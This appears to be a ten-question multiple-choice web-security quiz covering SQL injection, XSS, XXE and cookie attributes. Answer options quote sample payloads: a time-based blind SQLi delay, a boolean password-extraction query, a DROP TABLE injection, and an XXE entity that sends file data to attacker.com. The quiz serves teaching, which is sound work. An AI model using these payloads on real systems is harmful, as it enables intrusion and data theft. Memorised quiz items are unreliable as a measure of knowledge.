• Tutorials
  • Courses
  • Tracks

Cyber Quiz Day 31

Last Updated :
Discuss
Comments

Question 1

You have a login form that returns the same generic “Invalid credentials” message for wrong usernames and wrong passwords. Which of the following is the most reliable way to confirm a blind SQL injection vulnerability exists without triggering noisy errors?

  • Submit username' OR '1'='1-- and check for a different error page.

  • Inject a time-based payload (e.g., '; WAITFOR DELAY '0:0:10'--) and measure response time.

  • Add UNION SELECT payloads and look for SQL errors in the response.

  • Try a large input string to cause a buffer overflow and observe crash logs.

Discuss it

Question 2

Which of the following is the weakest mitigation strategy against SQL injection, despite being commonly recommended?

  • Using prepared statements / parameterized queries.

  • Using ORM methods that bind parameters.

  • Applying a strict allowlist (whitelist) for expected input values.

  • Escaping input based on the DB engine’s escaping rules.

Discuss it

Question 3

A comment field stores attacker-supplied HTML that later executes in other users’ browsers when they view the page. The malicious script is persisted in the application database. What type of XSS is this?


  • Reflected XSS

  • DOM-based XSS

  • Stored (persistent) XSS

  • Mutated XSS

Discuss it

Question 4

You must prevent XSS in an app that returns user comments inside an HTML context but also supports basic Markdown (bold, links). Which approach is the safest while preserving formatting?

  • Sanitize HTML with a permissive whitelist (allow <b>, <a>) using a vetted HTML sanitizer library.

  • Strip all HTML tags and render raw Markdown as HTML.

  • Escape all user input and then run a Markdown-to-HTML converter.

  • Rely on CSP to block inline scripts and do nothing server-side.

Discuss it

Question 5

Which XXE payload technique is specifically used to exfiltrate data out-of-band (OOB) to an attacker-controlled server?

  • Billion Laughs entity expansion to crash the parser.

  • Supplying <!DOCTYPE to trigger in-memory XML errors.

  • External entity referencing an HTTP URL: <!ENTITY xxe SYSTEM "http://attacker.com/steal?data=%file;">

  • Using CDATA sections to hide payloads.

Discuss it

Question 6

You maintain a Java web service using DocumentBuilderFactory to parse XML. Which single configuration call most directly mitigates XXE by disabling external entity resolution?

  • factory.setNamespaceAware(true)

  • factory.setExpandEntityReferences(true)

  • factory.setIgnoringElementContentWhitespace(true)

  • factory.setFeature("http://xml.org/sax/features/external-general-entities", false)

Discuss it

Question 7

Which boolean-based SQL injection payload can help you extract a single character of a string when only yes/no responses are observable?

  • AND 1=1

  • AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1) = 'a'

  • UNION SELECT password FROM users

  • ; DROP TABLE users; --

Discuss it

Question 8

A web application stores the session token in a cookie and has implemented HttpOnly. Which cookie attribute must you additionally set to reduce risk of session theft via cross-site requests (CSRF) and mitigate some XSS-related attacks?

  • Secure only

  • Path=/ only

  • Domain=.example.com

  • SameSite (preferably Strict or Lax)

Discuss it

Question 9

An application reflects a user-controlled value into the page, but only into a JavaScript location.hash fragment which then gets used by client-side code to construct HTML via document.write(location.hash). What is the most accurate classification and why is it dangerous?

  • DOM-based XSS - dangerous because client-side code writes untrusted data into the DOM.

  • Reflected XSS - safe because hash is not sent to server.

  • Stored XSS - dangerous because value persists on the server.

  • CSP bypass - not XSS at all.

Discuss it

Question 10

You must prevent XXE and also keep legitimate XML features for trusted feeds. What is the most practical design pattern to follow?

  • Disable external entities globally and accept that some feeds won’t work.

  • Allow external entities for all inputs; rely on perimeter WAF to block attacks.

  • Parse untrusted XML with a secure XML parser configuration (disable external entities) and handle trusted feeds with a separate, explicitly-whitelisted parser configuration.

  • Convert all XML to JSON first and then parse JSON.

Discuss it

There are 10 questions to complete.

Take a part in the ongoing discussion